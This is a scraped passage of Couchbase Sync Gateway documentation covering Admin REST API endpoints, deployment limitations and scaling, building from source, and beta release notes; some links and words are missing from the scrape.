adminInterface configuration parameter). Do not expose this port—It belongs behind your firewall. Anyone who can reach this port has free access to and control over your databases and user accounts.
PUT /$DB/ – Configures a new database. The body of the request contains the database configuration as a JSON object ()the same as an entry in the
databases property of a configuration file. Note that this doesn’t create a Couchbase Server bucket—you need to do that before configuring the database.
DELETE /$DB/ – Removes a database. It doesn’t delete the Couchbase Server bucket or any of its data, though, so you could bring the database back later with a PUT.
/$DB/_user/$name – represents a user account. It supports GET, PUT, and DELETE, and you can also POST to
/$DB/_user/. The body is a JSON object; for details see the [[Authentication]] page. The special user name
GUEST applies to unauthenticated requests.
/$DB/_role/$name – represents a role. This API is similar to users.
/$DB/_session – POST to this endpoint to create a logon session. The request body is a JSON object containing the username in the
name object and the duration of the session (in seconds) in the
ttl object. The response is a JSON object with properties
session_id (the session cookie string),
expires (the time the session expires) and
cookie_name (the name of the HTTP cookie to set).
/_compact – Compacts a database by removing obsolete document bodies. Needs to be run occasionally.
/_profile – POST to this endpoint to enable Go CPU profiling, which can be useful for diagnosing performance problems. To start profiling, send a JSON body with a
file property whose value is a path to write the profile to. To stop profiling, send a request without a
file property.
A quick way to tell whether you’re talking to the Admin REST API is by sending a
GET / request and checking whether the resulting object contains an
"ADMIN": true property.
HTTP requests logged to the console show the user name of the requester after the URL. If the request is made on the admin port, this is “(ADMIN)” instead.
This section contains information about Sync Gateway deployments.
Sync Gateway has the following limitations:
It cannot operate on pre-existing Couchbase buckets with app data in them because Sync Gateway has its own document schema and needs to create and manage documents itself. You can migrate existing data by creating a new bucket for the gateway and then using the Sync REST API to move your documents into it via PUT requests. You can’t make changes to the Couchbase bucket directly. You have to go through the Sync Gateway API.
Explicit garbage collection is required to free up space, via a REST call to
/$DB/_compact. Garbage collection is not scheduled automatically, so you have to call it yourself.
Document IDs longer than 180 characters overflow the Couchbase Server maximum key length and cause an HTTP error.
Sync Gateway can be scaled up by running it as a cluster. This means running an identically configured instance of Sync Gateway on each of several machines, and load-balancing them by directing each incoming HTTP request to a random node. Sync Gateway nodes are “shared-nothing,” so they don’t need to coordinate any state or even know about each other. Everything they know is contained in the central Couchbase Server bucket.
All Sync Gateway nodes talk to the same Couchbase Server bucket. This can, of course, be hosted by a cluster of Couchbase Server nodes. Sync Gateway uses the standard Couchbase “smart-client” APIs and works with database clusters of any size.
Keep in mind the following notes on performance:
Sync Gateway nodes don’t keep any local state, so they don’t require any disk.
Sync Gateway nodes do not cache much in RAM. Every request is handled independently. The Go programming language does use garbage collection, so the memory usage might be somewhat higher than for C code. However, memory usage shouldn’t be excessive, provided the number of simultaneous requests per node is kept limited.
Go is good at multiprocessing. It uses lightweight threads and asynchronous I/O. Adding more CPU cores to a Sync Gateway node can speed it up.
As is typical with databases, writes are going to put a greater load on the system than reads. In particular, replication and channels imply that there’s a lot of fan-out, where making a change triggers sending notifications to many other clients, who then perform reads to get the new data.
We don’t currently have any guidelines for how many gateway or database nodes you might need for particular workloads. We’ll know more once we do more testing and tuning and get experience with real use cases.
Very large-scale deployments might run into challenges managing large numbers of simultaneous open TCP connections. The replication protocol uses a “hanging-GET” technique to enable the server to push change notifications. This means that an active client running a continuous pull replication always has an open TCP connection on the server. This is similar to other applications that use server-push, also known as “Comet” techniques, as well as protocols like XMPP and IMAP.
These sockets remain idle most of the time (unless documents are being modified at a very high rate), so the actual data traffic is low—the issue is just managing that many sockets. This is commonly known as the “C10k Problem” and it’s been pretty well analyzed in the last few years. Because Go uses asynchronous I/O, it’s capable of listening on large numbers of sockets provided that you make sure the OS is tuned accordingly and you’ve got enough network interfaces to provide a sufficiently large namespace of TCP port numbers per node.
The developers are hungry for feedback about Sync Gateway. If you run into any roadblocks, please let us know by filing an issue on one of our projects or via the mailing list. What seems insignificant to you may be hitting everyone but the core developers, so until you let us know, we can’t fix it.
In general, cURL, a command-line HTTP client, is your friend. You might also want to try HTTPie, a human-friendly command-line HTTP client. By using these tools, you can inspect databases and documents via the Sync.
If you’re having trouble, feel free to ask for help on the mailing list. If you’re pretty sure you’ve found a bug, please file a bug report.
The Sync Gateway code is available on GitHub:.
To build Sync Gateway from source, you must have Go 1.2 or later installed on your computer.
On Mac or Unix systems, you can build Sync Gateway from source as follows:
Open a terminal window and change to the directory that you want to store Sync Gateway in.
Clone the Sync Gateway GitHub repository:
$ git clone
Change to the sync_gateway directory:
$ cd sync_gateway
Set up the submodules:
$ git submodule init $ git submodule update
Build Sync Gateway:
$ ./build.sh
Sync Gateway is a standalone, native executable located in the ./bin directory. You can run the executable from the build location or move it anywhere you want.
To update your build later, pull the latest updates from GitHub, update the submodules, and run
./build.sh again.
This is the third.
We’ve made some major changes since Beta 2 to make Sync Gateway more performant, scalable, and co-exist better with Couchbase Server. Features introduced in Beta 3 include the following:
Bucket shadowing We have designed a co-existence path with Couchbase Server web clients using a workflow dubbed “bucket shadowing”. A Couchbase Server managed bucket and a Sync Gateway compatible bucket “shadow” each other. The Couchbase Server bucket can continue to be managed using regular Couchbase Server APIs. Also, if you’re already using Couchbase Server and want to make your existing data available to Couchbase Lite mobile clients, this is the recommended approach. More information can be found here.
New Configuration Properties Properties have been added to increase flexibility for compression, maxinum number of open file descriptors allowed and support for bucket shadowing. They are as follows:
compressResponses: set this to
falseto disable GZip compression of HTTP responses, if your gateway is behind a proxy server that applies its own compression.
maxFileDescriptors: The maximum number of open file descriptors/sockets. The gateway calls
setrlimitat startup time to request 5000 file descriptors, but if you need more (which is likely for heavily loaded servers) you can set this property to request a higher number.
shadow: Configures bucket shadowing.
Admin API Enhancements We’ve added a number of Admin enhancements that include:
GET /db/_config.
GET /_expvarwill return a (large) JSON response containing a lot of internal statistics about the gateway. We use this internally for performance testing but it could be useful to you too. See the expvars page for details.
Performance Enhancements We’ve added support to handle GZip-compressed HTTP requests and responses, WebSocket protocol for continuous
_changes feed, and in-memory caching of recently requests document bodies as well as change history.
Some fixes to highlight in this release:
Replication support
Changes feed
Correctly assign document channels when importing existing docs from a Couchbase bucket or after changing the sync function.
GET /dbno longer includes a
doc_countproperty. It’s quite expensive to count the number of documents in a Couchbase bucket. This URL gets accessed at the beginning of every replication, so the overhead of including
doc_countwas significant, even though it appears to be unused.
This is the second.
The primary focus of the second Beta release for Sync Gateway has been performance enhancement, horizontal scaling, and increased stability.
Overall performance fixes to improve product usability.
Authentication
Web Client Support
Attachment Support
Higher ulimit
Installation
Rebalance support
This is the.
Dynamic sync capabilities via Sync Function APIs—Apps can begin to automatically sync data from the cloud without any manual setup by using Couchbase sync functions.
Easy Administration—Manage Sync Gateway via the Admin REST API when you need to.
Seamless scale-out—Easily scale your Sync Gateway tier as your application needs grow.
None.
We are currently working on performance tuning and are aware of issues when Sync Gateway is scaled. If you run into a performance issue, please let us know.
|
http://docs.couchbase.com/sync-gateway/
|
CC-MAIN-2014-52
|
refinedweb
| 5,471
| 54.22
|
Ninjago Spinjitzu Spinball Full Versionl
Ninjago Spinjitzu Spinball Full Versionl
Video Games – wikipedia, the free encyclopediaQ:
Why was the incorrect spelling given for the “almost exact duplicate” in the DBA.stackexchange database?
The question linked above gets a list of “duplicates” from a vote. One of the reasons they gave was as follows
I feel that this question is almost exact duplicate of the following question
I see the following
The following question is a dupe of the one linked above
But the following is not a dupe
I don’t see why that is a dupe, and I can’t mark my own question as a dupe. Did I get an error? Am I doing something wrong?
A:
I have no idea, but perhaps at some point in the 1.5 years this has been in the system (post-mortem), a user input an incorrect reason for a duplicate. That may have happened several times, and then a request for dbq munging was made to sort it all out.
Q:
R: Multiple Plot Calls in an R Script
My script was working fine until I changed from 3 lines to 4. This is the script I’m working on:
DD
A game based on the Lego Ninjago Spinjitzu Spinball toy, but with a nice storyline.. Ninjago Spinjitzu Spinball is a match-3 puzzle game developed by Paradoxon Games and published by Vostu Games. The game was released on August 15, 2017, for Android and iOS.The game follows the storyline of the spinjitzu spinball toy..Q:
How can I generate a URL when using ASP.NET’s Routing?
I’m trying to generate a custom URL when using ASP.NET’s Routing.
For example:
This obviously contains the UserId and a DestinationId.
I would like to replace this with:
Is it possible?
Cheers.
EDIT: here is my RouteConfig.cs, in case it is useful:
public class RouteConfig
{
public static void RegisterRoutes(RouteCollection routes)
{
routes.IgnoreRoute(“{resource}.axd/{*pathInfo}”);
routes.MapRoute(
name: “Default”,
url: “{controller}/{action}/{id}”,
defaults: new { controller = “Home”, action = “Index”, id = UrlParameter.Optional }
);
}
}
A:
You can do that by changing the URL definition in the RouteConfig.cs as following:
public class RouteConfig
{
public static void RegisterRoutes(RouteCollection routes)
{
routes.IgnoreRoute(“{resource}.axd/{*pathInfo}”);
routes.MapRoute(
name: “Default”,
url: “{action}/{id}”,
defaults: new
50b96ab0b6
Ninjago Spinjitzu Spinball Full Versionl
Ninjago Spinjitzu Spinball Full Versionl
Igo 8
PRARAMBA VERSION FULL MOVIE FREE
Nyobenez swiss cheese nyobenez farto
Always 20 off club clipart
All you have to do is input a valid discount code at the end of the purchase, no tools required. This is our corporate store and is protected by a password. It has never been easier to purchase products in the United States and Canada. Mastercard, Visa, RBC, EBT, employee discount, VISA, Debit, Gift Card, Reward, and ALL other COD’s.
Tools are required for this type of service. Thank you.
PayPal is a registered trademark of PayPal, Inc., and its affiliated companies. Certain emails associated with AssistMyApp.com are owned, controlled or licensed by PayPal, and are not affiliated with the site.
All products are sold under our own inventory, and are not direct purchases from the vendor.
For ordering questions or concerns, please contact us on our shop contact page.
International customers please note, COD orders will take much longer, and may be subject to customs delays or restrictive trade practices. Do not purchase domestic COD orders if you can help it.
Visit our shop, assistmyapp.com, and use our secure shopping cart.
Top navigation links
Use our search tool to find and select products to purchase.
Log in to enjoy all of our great savings.
In your cart, you may view the items that are in stock.
Enter your PayPal email address to access your virtual shopping cart.
Click “SEND” to pay securely for the products in your cart.
AssistMyApp.com will handle your PayPal transaction and email order confirmation.Rubbish Removal Christchurch
Guttering Cleaning & Repairs
Christchurch, New Zealand
Roofline s are the number one rated home renovation company in Christchurch. Our ability to provide a prompt, reliable and friendly service is why we have such a strong reputation in Christchurch and southern New Zealand. As a family owned business our team of fully trained tradesmen work with you, your budget and your home to give you the perfect solution for your Christchurch guttering issues.
Roofline
|
https://ibipti.com/ninjago-spinjitzu-spinball-full-_best_-versionl/
|
CC-MAIN-2022-40
|
refinedweb
| 732
| 64.61
|
Net::Fluidinfo::Tag - Fluidinfo tags
use Net::Fluidinfo::Tag; # create $tag = Net::Fluidinfo::Tag->new( fin => $fin, description => $description, indexed => 1, path => $path ); $tag->create; # get, optionally fetching descrition $tag = Net::Fluidinfo::Tag->get($fin, $path, description => 1); $tag->namespace; # update $tag->description($new_description); $tag->update; # delete $tag->delete;
Net::Fluidinfo::Tag models Fluidinfo tags.
Net::Fluidinfo::Tag is a subclass of Net::Fluidinfo::Base.
Net::Fluidinfo::Tag consumes the roles Net::Fluidinfo::HasObject, and Net::Fluidinfo::HasPath.
Constructs a new tag. The constructor accepts these parameters:
An instance of Net::Fluidinfo.
A description of this tag.
A flag that tells Fluidinfo whether this tag should be indexed. This attribute mirrors the Fluidinfo API, but please note that Fluidinfo currently ignores its value, nowadays all tags are indexed.
The namespace you want to put this tag into. An instance of Net::Fluidinfo::Namespace representing an existing namespace in Fluidinfo.
The name of the tag, which is the rightmost segment of its path. The name of "fxn/rating" is "rating".
The path of the tag, for example "fxn/rating".
The
description attribute is not required because Fluidinfo allows fetching tags without their description. It must be defined when creating or updating tags though.
The attributes
namespace,
path, and
name are mutually dependent. Ultimately tag creation has to be able to send the path of the namespace and the name of the tag to Fluidinfo. So you can set
namespace and
name, or just
path.
This constructor is only useful for creating new tags in Fluidinfo. Existing tags are fetched with
get.
Retrieves the tag with path
$path from Fluidinfo. Options are:
Tells
get whether you want to fetch the description.
Net::Fluidinfo provides a convenience shortcut for this method.
Determines whether
$path1 and
$path2 are the same in Fluidinfo. The basic rule is that the username fragment is case-insensitive, and the rest is not.
Creates the tag in Fluidinfo. Please note that tags are created on the fly by Fluidinfo if they do not exist.
Creating a tag by hand may be useful for example if you want to change the inherited permissions right away. That may be interesting if you are going to store sensitive data that would be by default readable. Other than that, it is recommended that you let Fluidinfo create tags as needed.
Updates the tag in Fluidinfo. Only the description can be modified.
Deletes the tag in Fluidinfo.
Gets/sets the description of the tag.
Note that you need to set the
description flag when you fetch a tag for this attribute to be initialized.
A flag, indicates whether this tag is indexed in Fluidinfo.
This predicate mirrors the Fluidinfo API. Nowadays all tags are indexed, so this predicate returns always true.
The namespace the tag belongs to, as an instance of Net::Fluidinfo::Namespace. This attribute is lazy loaded.
The name of the tag.
The path of the tag.*/tags/*
Xavier Noria (FXN), <fxn@cpan.org>
This program is free software; you can redistribute it and/or modify it under the terms of either: the GNU General Public License as published by the Free Software Foundation; or the Artistic License.
See for more information.
|
http://search.cpan.org/dist/Net-Fluidinfo/lib/Net/Fluidinfo/Tag.pm
|
CC-MAIN-2016-44
|
refinedweb
| 530
| 52.05
|
Connect Anything with Mayhem
Connect Anything with Mayhem
Join the DZone community and get the full member experience.Join For Free
Now, what makes Mayhem so cool is that you can simply select an event and connect it to a reaction and turn it on, without any code and there you are! An Event can be an email alert, when someone posts on your Facebook wall, stock or weather alert, an input from your mobile phone, a speech recognition command and anything you could dream of. Whereas a Reaction is what happens when an event occurs, a reaction can be a phone call, it might be running a program, scheduling an appointment with a doctor, putting on your tv set, starting your web camera and the list goes on and on as you could imagine. You are responsible for connecting an event to a reaction and then turning it on. The beauty of it is that you dont have to be a programmer or have a computer science degree to do that.
You can download the mayhem application from Codeplex and install it, then you are good to go. After the installation, if you run the application, you should see an interface like this.
You can click on Choose Event to select any event you want, there are some basic events that you can choose from as you can see below, if you click on Choose Reaction, it will equally bring out a dialog box containing the list of Reactions.
You can now select any event and associate a reaction to it. If I want to open Safari any time I pronounce the word "Browser", I will simply select Speech Recognition from the Event List and type browser into the Listen for Phrase textbox and click ok and then associate a Reaction to it, by selecting Run Program from the Reaction List, it will then bring a dialog box prompting me to navigate to where the program to be run is, in which I will select Safari application file from Safari folder in Program file folder. And the last thing to do is to put it on and that is it. Anytime I pronounced the word browser my system will open up Safari.
The coolest thing about Mayhem is that you can extend it, you as a programmer or developer can write your own reaction or event and deploy it as a module into your Mayhem installation, and if your module is good enough and you want others to use it, you can submit it to the Outercurve foundation for review and acceptance.
Would it not be nice if I want to go out and simply tell my computer system to hibernate, without me touching it? I would demonstrate the power of Mayhem by writing a Reaction that will hibernate the system, so that anytime I say "hibernate", my computer will hibernate.
Before you can starting writing modules for Mayhem, you need to setup visual studio, if you have not installed Nuget, you need to do that, this article here will show you how to install Nuget. After Nuget installation has been done, you need to install Mayhem packages and this can be done by Selecting Library Package Manager from Tool menu in visual studio and then select Package Manager Setting, in the dialog box that will be displayed, click on Package Source, now type Mayhem Package in the name textbox and type in the source textbox and click ok.
Create a new C# class library project and give it the name Mayhem.Hibernator or any name you like. In the project's solution explorer, right click References and select Manage Nuget Package. This will bring a new dialog box, click the Online tab and select Mayhem Packages, this will bring a number of Mayhem packages, select and install MayhemCore.
Add a new class to the class library project and name it Hibernator. You need to add reference to MayhemCore so as to be able to access the Mayhem base classes and other functionalities. Since the module will be a reaction, the class must extend ReactionBase class so that the Perform method can be overriden. The class must be decorated with the DataContract attribute which is found in System.Runtime.Serialization namespace and MayhemModule attribute contained in MayhemCore. The MayhemModule attribute has two parameters; the name and description of the reaction.
using System.Runtime.Serialization; using MayhemCore; using System; namespace Mayhem.Hibernator { [DataContract] [MayhemModule("Hibernator", "this reaction hibernates the system")] public class Hibernator : ReactionBase { public override void Perform() { System.Diagnostics.Process.Start("shutdown", "-h"); } } }
The code that will be executed when the reaction is called will be placed in the Perform method, after the code has been written, you can now build the class library project. The output of the class library project which is a dll file can now be copied and placed in " C:\Program Files\Outercurve\Mayhem\DefaultModules.1.0.0\lib\net40" depending on where your Mayhem installation is. Restart Mayhem application and click Choose Reaction, you will see the that Hibernator has been added to the Reaction list.
You can now connect any Event of your choice to this Reaction, in this case I associate a Speech Recognition Event with the Reaction so that anytime I say hibernate, the system will hibernate itself.
This is a simple demonstration of Mayhem, you can use Mayhem to do virtually anything you can dream of !!! }}
|
https://dzone.com/articles/connect-anything-mayhem
|
CC-MAIN-2018-34
|
refinedweb
| 907
| 54.97
|
Hot questions for Using Neural networks in style transfer
Question:
I'm just getting started with these topics. To the best of my knowledge, style transfer takes the content from one image and the style from another, to generate or recreate the first in the style of the second whereas GAN generates completely new images based on a training set.
But I see a lot of places where the two has been used interchangeably, like this blog here and other places where GAN is used to achieve style transfer, like this paper here
Are GAN and Style transfer two different things or is GAN the method to implement style transfer or are they both different things that does the same thing? Where exactly is the line between the two?
Answer:
GAN is a neural network architecture
style transfer is a (set of) processing method (can be as simple as grayscale or blur)
So the relation is:
GANcan be used to implement style transfer. (and other things)
To make it more complicate (hopefully this can make something clear), if you think the feature vector as a style of an image, then
feature vector -> image conversion is a style transfer :)
Question:
I've been going through Chollet's Deep Learning with Python, where he briefly covers L2-normalization with regards to Keras. I understand that it prevents overfitting by adding a penalty proportionate to the sum of the square of the weights to the cost function of the layer, helping to keep weights small.
However, in the section covering artistic style transfer, the content loss as a measure is described as:
the L2 norm between the activations of an upper layer in a pretrained convnet, computed over the target image, and the activations of the same layer computed over the generated image. This guarantees that, as seen from the upper layer, the generated image will look similar.
The style loss is also related to the L2-norm, but let's focus on the content loss for now.
So, the relevant code snippet (p.292):
def content_loss(base, combination): return K.sum(K.square(combination - base)) outputs_dict = dict([(layer.name, layer.output) for layer in model.layers]) content_layer = 'block5_conv2' style_layers = ['block1_conv1', 'block2_conv1', 'block3_conv1', 'block4_conv1', 'block5_conv1'] total_variation_weight = 1e-4 style_weight = 1. content_weight = 0.025 #K here refers to the keras backend loss = K.variable(0.) layer_features = outputs_dict[content_layer] target_image_features = layer_features[0, :, :, :] combination_features = layer_features[2, :, :, :] loss += content_weight * content_loss(target_image_features, combination_features)
I don't understand why we use the outputs of each layer, which are image feature maps, as opposed to Keras's
get_weights() method to fetch the weights to perform normalization. I do not follow how using L2-normalization on these feature maps penalizes during training, or moreover what exactly is it penalizing?
Answer:
I understand that it prevents overfitting by adding a penalty proportionate to the sum of the square of the weights to the cost function of the layer, helping to keep weights small.
What you are referring to is (weight) regularization and in this case, it is L2-regularization. The L2-norm of a vector is the sum of squared of its elements and therefore when you apply L2-regularization on the weights (i.e. parameters) of a layer it would be considered (i.e. added) in the loss function. Since we are minimizing the loss function the side effect is that the L2-norm of the weights will be reduced as well which in turn means that the value of weights has been reduced (i.e. small weights).
However, in the style transfer example the content loss is defined as the L2-norm (or L2-loss in this case) of the difference of between activation (and not weights) of a specific layer (i.e.
content_layer) when applied on the target image and the combination image (i.e. target image + style):
return K.sum(K.square(combination - base)) # that's exactly the definition of L2-norm
So no weight regularization is involved here. Rather, the loss function used is the L2-norm and it is used as a measure of similarity of two arrays (i.e. activations of the content layer). The smaller the L2-norm, the more similar the activations.
Why activations of the layer and not its weights? Because we want to make sure that the contents (i.e. representations given by the
content_layer) of the target image and the combination image are similar. Note that weights of a layer are fixed and does not change (after training, of course) with respect to an input image; rather, they are used to describe or represent an specific input image, and that representation is called activations of that layer for that specific image.
Question:
Im studying style-transfer networks and right now working with this work and here is network description. The problem that even with adding TV loss there is still visible noise which is breaking quality of result. Can someone recommend some articles of ways of removing such noise during network training?
Thanks
Answer:
The
deconvolution noise is because of the uneven overlaps between the input and the kernel which creates a checkerboard-like pattern of varying magnitudes. One fix is to use
resize-conv method as mentioned in this article.
Resize-conv replaces
transpose convolution with
image scaling followed by a
2D convolution. In tensor flow, the 2 steps are:
tf.image.resize_images(...) and
tf.nn.conv2d(...). Another tip from the authors is to call
tf.pad(...) prior to the convolution method and only use
Nearest Neighbour resize method.
Question:
I have a set of around 60 fractals (e.g
And a set of 60 snacks (e.g
And I want to apply the style of the fractal on the snack.
Is this possible? Or must I take specifically images from an existing data set with a pre-trained images model?
Thanks
Answer:
It depends whether the method involves training a model on style data or not.
At least one method does not require that at all, instead training a network on a classification task and then infering the style of an image during the style transfer. So you can use a model that has been pre-trained on images that you do not have, and then use it and your images to perform the style transfers.
There is some ready-to use code to do that : example
|
https://thetopsites.net/projects/neural-network/style-transfer.shtml
|
CC-MAIN-2021-31
|
refinedweb
| 1,059
| 60.85
|
I am making a Python web-crawler program to play The Wiki game.
If you're unfamiliar with this game:
- Start from some article on Wikipedia
- Pick a goal article
- Try to get to the goal article from the start article just by clicking wiki/ links
My process for doing this is:
- Take a start article and a goal article as input
- Get a list of articles that link to the goal article
- Preform a breadth-first search on the links found avoiding pages that have already been visited starting from the start article
- Check if the goal article is on the current page: If it is, then return the
path_crawler_took+goal_article
- Check if any of the articles that link to the goal are on the current page. If one of them is, return
path_crawler_took+intermediate_article+goal
I was having a problem where the program would return a path, but the path wouldn't really link to the goal.
def get_all_links(source): source = source[:source.find('Edit section: References')] source = source[:source.find('id="See_also"')] links=findall('\/wiki\/[^\(?:/|"|\#)]+',source) return list(set([''+link for link in links if is_good(link) and link])) links_to_goal = get_all_links(goal)
I realized that I was getting the links to the goal by scraping all of the links off of the goal page, but wiki/ links are unidirectional: Just because the goal links to a page doesn't mean that page links to the goal.
How can I get a list of articles that link to the goal?
|
https://www.howtobuildsoftware.com/index.php/how-do/pTR/python-python-27-web-crawler-get-all-links-from-page-on-wikipedia
|
CC-MAIN-2020-10
|
refinedweb
| 252
| 55.2
|
Serializing an Atoms object in xml
Posted June 28, 2015 at 12:26 PM | categories: xml, ase, python | tags: | View Comments
I have a future need to serialize an Atoms object from ase as XML. I would use json usually, but I want to use a program that will index xml. I have previously used pyxser for this, but I recall it being difficult to install, and it does not pip install on my Mac. So, here we look at xmlwitch which does pip install ;). This package does some serious magic with context managers.
One thing I am not sure about here is the best way to represent numbers and lists/arrays. I am using repr here, and assuming you would want to read this back in to Python where this could simply be eval'ed. Some alternatives would be to convert them to lists, or save them as arrays of xml elements.
from ase.data.g2 import data from ase.structure import molecule import xmlwitch atoms = molecule('H2O') def serialize_atoms(atoms): 'Return an xml string of an ATOMS object.' xml = xmlwitch.Builder(version='1.0', encoding='utf-8') with xml.atoms(): for atom in atoms: with xml.atom(index=repr(atom.index)): xml.symbol(atom.symbol) xml.position(repr(atom.position)) xml.magmom(repr(atom.magmom)) xml.mass(repr(atom.mass)) xml.momentum(repr(atom.momentum)) xml.number(repr(atom.number)) xml.cell(repr(atoms.cell)) xml.pbc(repr(atoms.pbc)) return xml atoms_xml = serialize_atoms(atoms) print atoms_xml with open('atoms.xml', 'w') as f: f.write(str(atoms_xml))
<?xml version="1.0" encoding="utf-8"?> <atoms> <atom index="0"> <symbol>O</symbol> <position>array([ 0. , 0. , 0.119262])</position> <magmom>0.0</magmom> <mass>15.9994</mass> <momentum>array([ 0., 0., 0.])</momentum> <number>8</number> </atom> <atom index="1"> <symbol>H</symbol> <position>array([ 0. , 0.763239, -0.477047])</position> <magmom>0.0</magmom> <mass>1.0079400000000001</mass> <momentum>array([ 0., 0., 0.])</momentum> <number>1</number> </atom> <atom index="2"> <symbol>H</symbol> <position>array([ 0. , -0.763239, -0.477047])</position> <magmom>0.0</magmom> <mass>1.0079400000000001</mass> <momentum>array([ 0., 0., 0.])</momentum> <number>1</number> </atom> <cell>array([[ 1., 0., 0.], [ 0., 1., 0.], [ 0., 0., 1.]])</cell> <pbc>array([False, False, False], dtype=bool)</pbc> </atoms>
Now, we can try reading that file. I am going to use emacs-lisp here for fun, and compute the formula.
(let* ((xml (car (xml-parse-file "atoms.xml"))) (atoms (xml-get-children xml 'atom)) (symbol-elements (mapcar (lambda (atom) (car (xml-get-children atom 'symbol))) atoms)) (symbols (mapcar (lambda (x) (car (xml-node-children x))) symbol-elements))) (mapconcat (lambda (c) (format "%s%s" (car c) (if (= 1 (cdr c)) "" (cdr c)))) (loop for sym in (-uniq symbols) collect (cons sym (-count (lambda (x) (string= x sym)) symbols))) ""))
OH2
Here is a (misleadingly) concise way to do this in Python. It is so short thanks to there being a Counter that does what we want, and some pretty nice list comprehension!
import xml.etree.ElementTree as ET from collections import Counter with open('atoms.xml') as f: xml = ET.fromstring(f.read()) counts = Counter([el.text for el in xml.findall('atom/symbol')]) print ''.join(['{0}{1}'.format(a,b) if b>1 else a for a,b in counts.iteritems()])
H2O
And finally a test on reading a unit cell.
import xml.etree.ElementTree as ET from numpy import array with open('atoms.xml') as f: xml = ET.fromstring(f.read()) print eval(xml.find('cell').text)
[[ 1. 0. 0.] [ 0. 1. 0.] [ 0. 0. 1.]]
That seems to work but, yeah, you won't want to read untrusted xml with that! See . It might be better (although not necessarily more secure) to use pickle or some other serialization strategy for this.
Copyright (C) 2015 by John Kitchin. See the License for information about copying.
Org-mode version = 8.2.10
|
http://kitchingroup.cheme.cmu.edu/blog/category/ase/
|
CC-MAIN-2017-39
|
refinedweb
| 656
| 58.99
|
Opened 3 years ago
Last modified 22 months ago
#21729 new Cleanup/optimization
DecimalField.to_python() fails on values with invalid unicode start byte
Description
Consider the following example:
from django.forms import Form from django.forms.fields import DecimalField class MyForm(Form): field = DecimalField() data = {'field': '1\xac23'} form = MyForm(data) form.is_valid() # This will raise a DjangoUnicodeDecodeError instead of returning False and having a validation error on the 'field'.
I noticed this on Django 1.5, but it looks like it also reproes on Django 1.6.
Upon investigation, it looks like smart_str was used in previous versions. Nowadays, it looks like smart_text can throw a DjangoUnicodeDecodeError in these cases. I believe this exception should be caught in the to_python code and go through the same codepath as when an exception is raised in the "Decimal(value)" code block.
Change History (4)
comment:1 Changed 3 years ago by
comment:2 Changed 22 months ago by
I think that with current Django code, a field should never receive such byte streams.
Not quite sure what this quote is referring to, possibly how requests are processed and handled before going into a view?
The Form class makes no rules about about where the data must come from.
I am hitting this issue when building an API using a Form's
CharField that takes the user's data from a CSV file.
They sent me a a string that ends in a partial UTF-8 character (only the first byte, and not the second), and the form raises
DjangoUnicodeDecodeError on
is_valid.
Pretty much exactly what the original example demonstrates.
I argue that there is a precedence to catch this exception (possibly in the
Field class), since the job of a
Form is to take any user input data and produce a list of errors. And when the user did send invalid data, the Form crashed instead of producing an error.
Here is (the relevant part of) a stack trace:
File "/home/my_user/my_project/apps/my_app/parsers.py", line 222, in parse_feed if not form.is_valid(): File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 129, in is_valid return self.is_bound and not bool(self.errors) File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 121, in errors self.full_clean() File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 273, in full_clean self._clean_fields() File "/usr/local/lib/python2.6/dist-packages/django/forms/forms.py", line 288, in _clean_fields value = field.clean(value) File "/usr/local/lib/python2.6/dist-packages/django/forms/fields.py", line 148, in clean value = self.to_python(value) File "/usr/local/lib/python2.6/dist-packages/django/forms/fields.py", line 208, in to_python return smart_text(value) File "/usr/local/lib/python2.6/dist-packages/django/utils/encoding.py", line 73, in smart_text return force_text(s, encoding, strings_only, errors) File "/usr/local/lib/python2.6/dist-packages/django/utils/encoding.py", line 119, in force_text raise DjangoUnicodeDecodeError(s, *e.args) django.utils.encoding.DjangoUnicodeDecodeError: 'utf8' codec can't decode byte 0xc3 in position 29: unexpected end of data. You passed in 'The Chesterfield brand Stor h\xc3' (<type 'str'>)
And here is my current workaround:
class MyForm(forms.Form): def _clean_fields(self, *args, **kwargs): try: return super(MyForm, self)._clean_fields(*args, **kwargs) except DjangoUnicodeDecodeError: msg = "The data you povided is not encoded properly, please ensure you have valid UTF-8." self._errors['__all__'] = self.error_class([msg])
comment:3 Changed 22 months ago by
comment:4 Changed 22 months ago by
Thanks for your input. I think that your use case makes sense. Note that
CharField is also subject to this issue, and other fields should be investigated.
I think that with current Django code, a field should never receive such byte streams. Could you provide us with a plausible use case where such invalid data can reach form data?
|
https://code.djangoproject.com/ticket/21729
|
CC-MAIN-2016-50
|
refinedweb
| 655
| 51.04
|
Messaging Cluster issueDaniel Bevenius Feb 5, 2008 3:59 AM
Hi,
we are using JBM 1.4.0.SP3 configured in a cluster. We have a four node cluster and use custom correlation ids to correlate messages.
Our messaging clients post a message to a queue and wait a specified amount of time for a message to appear on a response queue with the correlation id they expect.
Now the problem we are experiencing is that when several concurrent calls are made sometimes we are not able to retrieve the message from the clustered queue. We have verified that the message is infact there, with the correct correlation id.
We have tried to simulate this behaviour with the test class below.
public class DestinationPeeker { private static final String QUEUE_NAME = "queue/clusteredQueue"; private static final String JNDI_SERVER = "hostname:1100"; private static final String CORRELATION_ID = "12345"; private static String messageSelector = "JMSCorrelationID = \'" + CORRELATION_ID + "\'"; @Test public void peek() throws NamingException, JMSException { Context ctx = getContext(); Queue queue = (Queue) ctx.lookup( QUEUE_NAME ); QueueConnectionFactory factory = (QueueConnectionFactory) ctx.lookup( "ConnectionFactory" ); QueueConnection cnn = factory.createQueueConnection(); QueueSession session = cnn.createQueueSession( false, QueueSession.AUTO_ACKNOWLEDGE ); QueueBrowser browser = session.createBrowser( queue, messageSelector ); String messageSelector = browser.getMessageSelector(); Enumeration enumeration = browser.getEnumeration(); while ( enumeration.hasMoreElements() ) { Message jmsMsg = (Message) enumeration.nextElement(); System.out.print( "JMSMessageID : " + jmsMsg.getJMSMessageID() ); System.out.print( ", JMSCorrelelationID : " + jmsMsg.getJMSCorrelationID() ); System.out.print( ", JMSExpiration : " + jmsMsg.getJMSExpiration() ); System.out.println(""); } browser.close(); session.close(); cnn.close(); } @Test @Ignore public void putMessageOnQueue() throws NamingException, JMSException { Context ctx = getContext(); Queue queue = (Queue) ctx.lookup( QUEUE_NAME ); QueueConnectionFactory factory = ( QueueConnectionFactory ) ctx.lookup( "/ClusteredConnectionFactory" ); QueueConnection cnn = factory.createQueueConnection(); QueueSession session = cnn.createQueueSession( false, QueueSession.AUTO_ACKNOWLEDGE 